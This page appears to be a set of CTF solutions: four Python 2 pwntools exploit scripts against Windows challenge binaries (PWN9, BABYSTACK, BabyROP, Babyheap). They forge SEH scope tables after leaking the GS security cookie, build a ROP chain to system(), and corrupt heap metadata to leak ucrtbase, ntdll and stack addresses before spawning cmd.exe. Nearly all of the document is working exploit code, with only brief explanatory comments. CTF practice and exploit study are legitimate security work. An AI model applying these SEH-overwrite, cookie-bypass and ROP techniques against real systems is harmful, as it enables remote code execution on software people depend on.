[Windows][第五空间2019 决赛]PWN9
exp:
#!/usr/bin/python2
# -*- coding:utf-8 -*-
from pwn import *
# context.log_level = 'debug'
# Connection setup and the pwntools I/O shorthands this page's scripts share.
# The target is a 32-bit Windows binary (context.arch drives p32/u32 below).
# Only ru() and lg() are referenced further down in this script; the rest of
# the lambdas are a copied helper template and stay unused here.
context.arch = 'i386'
# Challenge service endpoint (a private-range address in the original post).
p = remote('192.168.0.100', 2222)
# Pointer-leak parsers: read up to a 0x7f / 0xf7 byte and unpack the bytes
# that precede it as an address (unused in this script).
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
# Reply after a prompt; both prompt and reply are coerced with str().
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
# Log a named integer in hex through pwntools' success() channel.
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
# Receive until the given marker (coerced with str()).
ru = lambda a :p.recvuntil(str(a))
def get_value(address):
    """Ask the service for the 32-bit value stored at *address*.

    Drives the program's "Do you want to know more?" / "Where do you want
    to know" dialogue over the global connection ``p`` and parses the
    hexadecimal number printed after "value is ".

    Args:
        address: integer address to query; it is sent as decimal text.

    Returns:
        The reported value as an int.
    """
    dialogue = (
        ('Do you want to know more?', 'yes'),
        ('Where do you want to know', str(address)),
    )
    for prompt, reply in dialogue:
        p.recvuntil(prompt)
        p.sendline(reply)
    p.recvuntil('value is ')
    # The rest of the line (newline dropped) is the hex text of the value.
    hex_text = p.recvuntil('\n', drop=True)
    return int(hex_text, 16)
"""
void __cdecl ValidateLocalCookies(void (__fastcall *cookieCheckFunction)(unsigned int), _EH4_SCOPETABLE *scopeTable, char *framePointer)
{
unsigned int v3; // esi@2
unsigned int v4; // esi@3
if ( scopeTable->GSCookieOffset != -2 )
{
v3 = *(_DWORD *)&framePointer[scopeTable->GSCookieOffset] ^ (unsigned int)&framePointer[scopeTable->GSCookieXOROffset];
__guard_check_icall_fptr(cookieCheckFunction);
((void (__thiscall *)(_DWORD))cookieCheckFunction)(v3);
}
v4 = *(_DWORD *)&framePointer[scopeTable->EHCookieOffset] ^ (unsigned int)&framePointer[scopeTable->EHCookieXOROffset];
__guard_check_icall_fptr(cookieCheckFunction);
((void (__thiscall *)(_DWORD))cookieCheckFunction)(v4);
}
int __cdecl _except_handler4_common(unsigned int *securityCookies, void (__fastcall *cookieCheckFunction)(unsigned int), _EXCEPTION_RECORD *exceptionRecord, unsigned __int32 sehFrame, _CONTEXT *context)
{
// 异或解密 scope table
scopeTable_1 = (_EH4_SCOPETABLE *)(*securityCookies ^ *(_DWORD *)(sehFrame + 8));
// sehFrame 等于 上图 ebp - 10h 位置, framePointer 等于上图 ebp 的位置
framePointer = (char *)(sehFrame + 16);
scopeTable = scopeTable_1;
// 验证 GS
ValidateLocalCookies(cookieCheckFunction, scopeTable_1, (char *)(sehFrame + 16));
__except_validate_context_record(context);
if ( exceptionRecord->ExceptionFlags & 0x66 )
{
......
}
else
{
exceptionPointers.ExceptionRecord = exceptionRecord;
exceptionPointers.ContextRecord = context;
tryLevel = *(_DWORD *)(sehFrame + 12);
*(_DWORD *)(sehFrame - 4) = &exceptionPointers;
if ( tryLevel != -2 )
{
while ( 1 )
{
v8 = tryLevel + 2 * (tryLevel + 2);
filterFunc = (int (__fastcall *)(_DWORD, _DWORD))*(&scopeTable_1->GSCookieXOROffset + v8);
scopeTableRecord = (_EH4_SCOPETABLE_RECORD *)((char *)scopeTable_1 + 4 * v8);
encloseingLevel = scopeTableRecord->EnclosingLevel;
scopeTableRecord_1 = scopeTableRecord;
if ( filterFunc )
{
// 调用 FilterFunc
filterFuncRet = _EH4_CallFilterFunc(filterFunc);
......
if ( filterFuncRet > 0 )
{
......
// 调用 HandlerFunc
_EH4_TransferToHandler(scopeTableRecord_1->HandlerFunc, v5 + 16);
......
}
}
......
tryLevel = encloseingLevel;
if ( encloseingLevel == -2 )
break;
scopeTable_1 = scopeTable;
}
......
}
}
......
}
"""
ru("= 0x")
stack = int(p.recvuntil("\n")[:-1],16)
lg("stack",stack)
ru("= 0x")
main_addr = int(p.recvuntil("\n")[:-1],16)
lg("main_addr",main_addr)
security_cookie = get_value(main_addr+0x404004-0x4010b0)
# lg("security_cookie_addr",main_addr+0x404004-0x4010b0)
lg("security_cookie",security_cookie)
scopetable = stack+0x94
lg("scopetable",scopetable)
excepthandler = stack+0x90
next_ptr = get_value(stack+0x90-0x4)
lg("next_ptr",next_ptr)
ExceptionHandler = main_addr+0x1460-0x10b0
lg("ExceptionHandler",ExceptionHandler)
backdoor = main_addr-0x10b0+0x138D
fake_scope = [
0x0FFFFFFEc, # GSCookieOffset -0x14
0, # GSCookieXOROffset
0x0FFFFFF20, # EHCookieOffset #-224
0, # EHCookieXOROffset
0x0FFFFFFFE, # ScopeRecord.EnclosingLevel -2
backdoor # ScopeRecord.FilterFunc
]
ebp = stack+0x9c
fake_scope_addr = stack+0x10
payload = "a"*0x10
payload += flat(fake_scope).ljust(0x88-0x10,"a")
payload += p32(ebp^security_cookie)
payload += p32(next_ptr)#next_ptr
payload += p32(ExceptionHandler) #exceptionhandler
payload += p32(fake_scope_addr^security_cookie) #scopetable
payload += p32(0) #try_level
p.recvuntil('Do you want to know more?')
p.sendline('nooo')
p.sendline(payload)
p.recvuntil('Do you want to know more?')
p.sendline('yes')
p.recvuntil('Where do you want to know')
p.sendline('0')
p.interactive()
[Windows][HITB GSEC]BABYSTACK
#!/usr/bin/python2
# -*- coding:utf-8 -*-
from pwn import *
# Connection setup and I/O shorthands (same helper template as the first
# script on this page).  'debug' logging prints every byte exchanged.  This
# script uses ru(), lg(), sla() and sl(); the remaining lambdas are unused.
context.log_level = 'debug'
context.arch = 'i386'
p = remote('node3.buuoj.cn',27300)
# Pointer-leak parsers (unused here).
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
# Reply after a prompt; prompt and reply are coerced with str().
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
# Log a named integer in hex.
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
ru("0x")
stack = int(p.recvuntil('\r')[:-1],16)
lg("stack",stack)
ru("0x")
main = int(ru("\r")[:-1],16)
lg("main",main)
def getaddr(addr):
    """Return the 32-bit value the service reports for *addr*.

    Answers "yes" at the "OtherwhereWillBeTheAnswer" prompt, sends *addr*
    as decimal text at the "Where do you want to know" prompt and parses
    the hex number printed after "is 0x" (the line ends in "\\r").
    """
    prompts = (
        ("OtherwhereWillBeTheAnswer\r\n", "yes"),
        ("Where do you want to know\r\n", str(addr)),
    )
    for prompt, reply in prompts:
        p.sendlineafter(prompt, reply)
    p.recvuntil("is 0x")
    digits = p.recvuntil('\r')[:-1]
    return int(digits, 16)
# Read the security cookie via the read primitive; 0x1610b0 / 0x164004 are
# presumably main's and the cookie's unrelocated addresses in this build of
# the binary (constants not shown on this page).
cookie = getaddr(main-0x1610b0+0x164004)
lg("cookie",cookie)
# Frame layout relative to the leaked stack value; unlike the first script,
# the handler address and the Next pointer are read from the live SEH record
# instead of being computed from image offsets.
ebp = stack+0x9c
try_level = ebp-0x4   # computed but not referenced below
ExceptionHandler = getaddr(ebp-0xc)
lg("ExceptionHandler",ExceptionHandler)
next_ptr = getaddr(ebp-0x10)
lg("next_ptr",next_ptr)
# Win function rebased with main's image offset (author's name).
backdoor = main+0x16138D-0x1610B0
lg("backdoor_addr",backdoor)
# Replacement _EH4_SCOPETABLE: four cookie offsets, then one scope record
# (EnclosingLevel, FilterFunc); field meanings per the author's inline notes
# and the decompiled handler in the first script.
fake_scope = [
0x0FFFFFFEc, # GSCookieOffset -0x14
0, # GSCookieXOROffset
0x0FFFFFF20, # EHCookieOffset #-224
0, # EHCookieXOROffset
0x0FFFFFFFE, # ScopeRecord.EnclosingLevel -2
backdoor # ScopeRecord.FilterFunc
]
fake_scope_addr = stack+0x10   # where the table lands inside the sent buffer
# Buffer layout: 0x10 filler, the table, filler up to 0x88, the frame's GS
# slot (presumably cookie ^ frame pointer, as XOROffset is 0), then the SEH
# registration fields.  The scope-table pointer and the GS slot are XORed with
# the cookie because the handler decodes them that way (see decompilation).
payload = "a"*0x10
payload += flat(fake_scope).ljust(0x88-0x10,"a")
payload += p32(ebp^cookie)
payload += p32(next_ptr)#next_ptr
payload += p32(ExceptionHandler) #exceptionhandler
payload += p32(fake_scope_addr^cookie) #scopetable
payload += p32(0) #try_level
# Decline the read prompt and send the over-long line; no further read is
# issued here (the commented getaddr(0) below was presumably the trigger used
# during testing).
sla("OtherwhereWillBeTheAnswer\r\n","no")
sl(payload)
# getaddr(0)
p.interactive()
[Windows][Others]BabyROP
#!/usr/bin/python2
# -*- coding:utf-8 -*-
from pwn import *
# Connection setup and I/O shorthands (same helper template as the other
# scripts on this page).  'debug' logging prints every byte exchanged.  Only
# lg() is used below; everything else goes through p directly.
context.log_level = 'debug'
context.arch = 'i386'
p = remote('node3.buuoj.cn',26336)
# p = remote("192.168.0.104",7777)
# Pointer-leak parsers (unused here).
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
# Log a named integer in hex.
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
p.recvuntil("name")
p.sendline("A"*24)
p.recvuntil("A"*24)
crt = p.recv(4)
msvcr_base = u32(crt) - 0x16e2d
lg("msvcr_base",msvcr_base)
system_address = msvcr_base + 0x62632
cmd_address = msvcr_base + 0x43030
payload = "A"*0xCC+"AAAA"+p32(system_address)+p32(0xdeadbeaf)+p32(cmd_address)
p.recvuntil("input your message length")
p.sendline(str(len(payload)))
p.sendline(payload)
p.interactive()
#78ABD04D
#78B02632 system
[Windows][ASIS 2017]Babyheap
#!/usr/bin/python2
# -*- coding:utf-8 -*-
from pwn import *
# context.log_level = 'debug'
# Connection setup and I/O shorthands (same helper template as the other
# scripts on this page).  The menu wrappers below use sla()/sa(); ru() and
# lg() are used in the main sequence; the rest of the lambdas are unused.
context.arch = 'i386'
# p = remote('node3.buuoj.cn',29886)
p = remote("192.168.0.104",2222)
# Pointer-leak parsers (unused here).
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,"\x00"))
# Reply after a prompt; prompt and reply are coerced with str().
sla = lambda a,b :p.sendlineafter(str(a),str(b))
sa = lambda a,b :p.sendafter(str(a),str(b))
# Log a named integer in hex.
lg = lambda name,data : p.success(name + ": 0x%x" % data)
se = lambda payload: p.send(payload)
rl = lambda : p.recv()
sl = lambda payload: p.sendline(payload)
ru = lambda a :p.recvuntil(str(a))
# The program prints an address inside its own image at start-up; 0x1090 is
# that address's offset from the image base (constant from the binary).
ru("0x")
codebase = int(ru("\r")[:-1],16)-0x1090
lg("codebase",codebase)
def cmd(idx):
    """Pick menu entry *idx* at the "choice?" prompt (sent as decimal text)."""
    choice = str(idx)
    p.sendlineafter("choice?\r\n", choice)
def add(size,payload):
    """Menu option 1: create a sword of *size* bytes whose content is *payload*.

    Both values are sent as lines at the "sword?" and "it!" prompts.
    """
    p.sendlineafter("choice?\r\n", "1")
    p.sendlineafter("sword?\r\n", str(size))
    p.sendlineafter("it!\r\n", str(payload))
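def edit(index, size, content):
    """Menu option 3: rewrite *size* bytes of sword *index* with *content*.

    Uses the shared cmd()/sla()/sa() helpers like the other menu wrappers in
    this script rather than spelling the menu choice out inline.  *content*
    is delivered with send() (no newline appended) after the "again : "
    prompt, so callers append the trailing '\\n' themselves, as the main
    sequence below does.
    """
    cmd(3)
    sla('polish?\r\n', index)
    sla('time?\r\n', size)
    sa('again : \r\n', content)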
def free(idx):
    """Menu option 2: destroy sword *idx* (sent as decimal text)."""
    p.sendlineafter("choice?\r\n", "2")
    p.sendlineafter('Which sword do you want to destroy?\r\n', str(idx))
def show(idx):
    """Menu option 4: print sword *idx*; the caller parses the output."""
    p.sendlineafter("choice?\r\n", "4")
    p.sendlineafter('Which one will you check?\r\n', str(idx))
# --- Stage 1: leak heap metadata ---
# Create six equal-sized swords, free the third, and fill sword 1 to its full
# size so show() prints past its data into the 8 bytes that follow it
# (presumably the freed neighbour's chunk header -- the allocator's layout is
# not visible on this page).
for i in range(6):
    add(0x58, 'a'*0x20)
free(2)
edit(1,0x58,"a"*0x58+'\n')
show(1)
ru("a"*0x58)
header = u64(ru("\r")[:-1].ljust(8,"\x00"))
lg("header",header)
# Two locations inside the program image; what they hold comes from the
# challenge binary and is not shown here.
addr = codebase+0x4370
addr2 = codebase+0x43bc
# heaader = ru("S")[:-1]
# edit(1,0x58+0x8,"a"*0x58+p64(header)+'\n')
# --- Stage 2: rewrite sword 1 with the captured header plus two image
# addresses right behind it, free it, then use the hidden menu entry 1337
# with addr2+2 as its "target". ---
free(4)
edit(1, 0x58 + 8 + 8, 'b' * 0x58 + p64(header) + p32(addr + 4) + p32(addr + 8) + '\n')
free(1)
p.sendlineafter('choice?\r\n', '1337')
p.sendlineafter('target?\r\n', str(addr2+0x2))
# From here on sword 2 appears to overlap the addr/addr2 region: pointers
# written through it decide what show(4)/show(5)/show(1) print.  (Inferred
# from the call sequence; the binary's bookkeeping is not visible here.)
payload = p32(addr2)+p32(addr)+p32(codebase+0x30c8)#4
payload += p32(0x300C+codebase)
edit(2,len(payload),payload+'\n')
edit(2,6,"\x01"*6+'\n')
# --- Stage 3: read DLL pointers and rebase ---
# 0xB89F0 and 0x44160 are the leaked pointers' offsets inside ucrtbase and
# ntdll; 0xEFDA0 / 0x15084 / 0x120c40 are likewise build-specific offsets
# (names are the author's).
show(4)
ru("how : ")
ucrtbase = u32(p.recv(4))-0xB89F0
lg("ucrtbase",ucrtbase)
sys_addr = 0xEFDA0+ucrtbase
cmd_addr = 0x15084+ucrtbase
show(5)
ru("how : ")
ntdll_base = u32(p.recv(4))-0x44160
lg("ntdll_base",ntdll_base)
ntdll_PedLdr_addr = ntdll_base+0x120c40
addr3 = ntdll_PedLdr_addr-0x34
# --- Stage 4: locate the stack ---
# Two reads through sword 1; only 3 bytes are received each time and padded
# to 4 (presumably the high byte is not printed).
edit(3,8,p32(addr)+p32(addr3)+'\n')
show(1)
ru("how : ")
stack_addr = u32(p.recv(3).ljust(4,"\x00"))-0x21c+0x3000
# lg("stack_addr",stack_addr)
edit(0,8,p32(addr)+p32(stack_addr)+'\n')
show(1)
ru("how : ")
stack_addr = u32(p.recv(3).ljust(4,'\x00'))
lg("stack_addr",stack_addr)
# Scan a page-aligned window of the stack, 4 bytes at a time, for the saved
# return value 0x193B+codebase.  `print i` is Python 2 syntax (the shebang
# pins python2).
ret_addr = stack_addr & 0xffff00
ret_addr = ret_addr+0x5c
lg("ret_addr",ret_addr)
ret_addr_content = 0x193B+codebase
for i in range(60,100):
    edit(0,8,p32(addr)+p32(ret_addr+i*4)+'\n')
    show(1)
    ru("how : ")
    ss = u32(p.recv(3).ljust(4,'\x00'))
    print i
    # print "["+str(hex(ret_addr+i*4)) + "] :" + str(hex(ss))
    if ss == ret_addr_content:
        log.success("Success Found!")
        ret_addr = ret_addr+i*4
        break
# NOTE(review): if no slot matched, the loop falls through silently and
# ret_addr keeps its pre-scan value; the writes below then go to the wrong
# place.  An explicit check (e.g. abort unless "Success Found!" fired) would
# make the failure obvious.
lg("ret_addr",ret_addr)
# --- Stage 5: write the string and the frame ---
# sword 0 now points at ret_addr and carries "cmd.exe\0" after the pointers.
s1 = p32(addr)+p32(ret_addr)+"cmd.exe\x00"
edit(0,len(s1),s1+'\n')
# show(1)
# ru("how : ")
# ss = u32(p.recv(3).ljust(4,'\x00'))
# lg("ss",ss)
# if(p.recv(4))
# edit(0,8,p32(addr)+p32(ret_addr)+'\n')
# Four dwords written through sword 1: system(), a return location inside
# the image, the string written above (addr+8), and a 0.
payload = [
sys_addr,
codebase+0x21AF,
addr+0x4+0x4,
0,
]
edit(1,16,flat(payload)+'\n')
# Menu entry 5 -- presumably the exit path that returns through the rewritten
# slot.
cmd(5)
p.interactive()